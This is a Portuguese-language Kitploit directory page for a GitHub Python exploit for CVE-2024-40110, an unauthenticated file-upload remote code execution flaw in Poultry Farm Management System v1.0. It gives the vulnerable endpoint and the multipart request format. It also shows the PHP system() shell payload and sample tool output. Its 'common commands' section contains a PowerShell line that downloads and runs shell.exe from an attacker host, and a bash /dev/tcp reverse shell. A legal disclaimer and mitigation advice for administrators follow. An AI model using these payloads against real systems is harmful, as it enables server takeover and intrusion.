Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-40110 — Exploit em Python para execução remota de código não autenticada via upload de arquivo no Poultry Farm Management System v1.0. Envia shells PHP para executar comandos arbitrários do sistema em alvos vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/angry-althaf/cve-2024-40110
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

Exploit em Python para execução remota de código não autenticada via upload de arquivo no Poultry Farm Management System v1.0. Envia shells PHP para executar comandos arbitrários do sistema em alvos vulneráveis.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 8 mesesAinda não revisado

Sistema de Gestão de Fazenda de Aves v1.0 - Exploit RCE

Tipo de Vulnerabilidade

Upload de Arquivo Não Autenticado com Execução Remota de Código

Descrição

O Sistema de Gestão de Fazenda de Aves v1.0 contém uma vulnerabilidade crítica na funcionalidade de upload de produtos. A aplicação falha ao validar e sanitizar adequadamente os uploads de arquivos, permitindo que atacantes enviem arquivos PHP disfarçados como imagens de produtos. Esses arquivos PHP carregados podem ser executados para alcançar a execução remota de código.

Endpoint Vulnerável

root@kitploit:~
POST /paultry/farm/product.php or POST /farm/product.php

Vetor de Ataque

A vulnerabilidade pode ser explorada por:

  1. Enviando uma requisição POST para o endpoint de upload de produtos
  2. Carregando um arquivo shell PHP com comandos arbitrários
  3. Acessando o arquivo carregado para executar os comandos embutidos

Requisitos

Pré-requisitos

  • Python 3.7+
  • biblioteca requests
  • biblioteca colorama (para saída colorida)
  • Acesso de rede ao alvo vulnerável

Instalação

root@kitploit:~
pip install requests colorama

Ou instale todas as dependências:

root@kitploit:~
pip install -r requirements.txt

Uso

Uso Básico

Execute o script interativamente:

root@kitploit:~
python exploit.py

O script solicitará:

  1. Endereço IP do Alvo - O endereço IP do servidor vulnerável
  2. Porta do Alvo - O número da porta (padrão: 80)
  3. Comando para Executar - O comando do sistema a ser executado no alvo

Exemplo

root@kitploit:~
==================================================
Interactive Backdoor Upload Tool
==================================================

Enter target IP address: 192.168.1.100
Enter target port (default: 80): 8080
Enter command to execute (default: powershell payload):
Command: whoami

==================================================
CONFIRMATION
==================================================
Target URL: http://192.168.1.100:8080
Command: whoami
Do you want to proceed? (yes/no): yes

Funcionalidades

✅ Entrada Interativa - Solicita IP, porta e comandos personalizados
✅ Valores Padrão - Padrões sensatos para conveniência
✅ Saída Colorida - Saída colorida no terminal para fácil leitura
✅ Etapa de Confirmação - Verifique as configurações antes da execução
✅ Tratamento de Erros - Mensagens de erro elegantes para requisições com falha
✅ Comandos Flexíveis - Suporte a qualquer comando shell ou payload PowerShell

Comandos Comuns

Alvos Windows

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Alvos Linux

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

Coleta de Informações

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

Detalhes Técnicos

Como Funciona

  1. Upload de Arquivo: Envia uma requisição POST com payload PHP embutido como um arquivo
  2. Execução do Payload: O arquivo PHP carregado é armazenado em /assets/img/productimages/
  3. Execução de Comando: Acessar o arquivo PHP dispara a execução de comandos via função system()
  4. Recuperação de Saída: O script obtém a saída via requisição GET

Estrutura da Requisição

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

Formato do Payload

root@kitploit:~
<?php system('COMMAND_HERE');?>

Ambiente de Teste

O exploit foi testado em:

  • SO: Windows 10
  • Servidor: XAMPP v3.3.0
  • Versão PHP: Compatível com PHP 5.6+

Aviso Legal

⚠️ AVISO LEGAL

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal.

  • Use este exploit apenas em sistemas que você possui ou tem permissão explícita por escrito para testar
  • Os autores não assumem responsabilidade por uso indevido ou danos causados por esta ferramenta
  • Os usuários são responsáveis por garantir a conformidade com todas as leis e regulamentações aplicáveis
  • Acesso, modificação ou interrupção não autorizada de sistemas de computador é crime federal sob o Computer Fraud and Abuse Act (CFAA) e leis similares em todo o mundo

Mitigação

Para Administradores

  1. Atualize o Software - Aplique patches de segurança se disponíveis

  2. Validação de Upload de Arquivo

    • Valide extensões de arquivo (whitelist: jpg, png, gif, etc.)
    • Verifique tipos MIME no lado do servidor
    • Armazene arquivos carregados fora da raiz web
    • Desabilite a execução de scripts em diretórios de upload
  3. Configuração

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. Controle de Acesso

    • Implemente autenticação antes de permitir uploads
    • Valide permissões de usuário
    • Adicione limitação de taxa
  5. Monitoramento

    • Monitore diretórios de upload para arquivos suspeitos
    • Registre todas as tentativas de upload
    • Implemente verificação de integridade de arquivos

Referências

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • Original Software: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Solução de Problemas

Conexão Recusada

root@kitploit:~
Error: Connection refused
Solution: Verify the target IP and port are correct and the application is running

404 Não Encontrado

root@kitploit:~
Error: Failed to upload shell. Status code: 404
Solution: The endpoint path may differ. Common paths: /farm/, /paultry/farm/

PHP Não Executado

root@kitploit:~
Error: Command output is empty
Solution: PHP execution may be disabled or the file wasn't uploaded correctly

Suporte

Para problemas, perguntas ou melhorias, consulte o repositório GitHub ou a página do Exploit-DB.


Última Atualização: Dezembro 2024
Status: Verificado e Testado

Baixar ferramenta